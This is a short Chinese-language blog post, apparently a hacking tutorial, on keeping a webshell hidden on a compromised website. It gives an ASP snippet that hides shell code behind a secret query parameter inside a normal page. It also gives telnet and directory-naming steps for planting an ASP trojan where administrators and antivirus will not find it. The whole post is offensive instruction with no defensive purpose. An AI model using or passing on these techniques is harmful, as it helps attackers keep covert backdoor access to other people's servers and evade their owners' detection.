得到网站的webshell后,如果被管理员发现,那么你的马就没用了 ,被删了! 所以我们要隐藏好我们的SHELL,管理员都也不是混饭吃的,! 1.下面教一种很菜的方法,ASP插入法,不容易被发现~ 在我们要做手脚的ASP文件里加入如下内容 <% if request="ok" then %> *********************** <% end if %> 在***********处加入你的shell代码 就可以了 访问的时候在你做了手脚的ASP文件后面加上?=shell(例如:index.asp?=shell) 就可以调出webshell了,不影响正常浏揽 2.还有一种方法 前提是得到系统权限之后, telnet 肉肉IP Port 成功telnet之后,传一个asp木马 进入网站目录 最后是在下一层吧 md s.../ copy 1.asp s.../ OK,这样防毒软件就搞不到了 防问时
http://your/
肉肉/s.../1.asp
如何更简单的留你的webshell后门
最新推荐文章于 2023-01-29 10:24:18 发布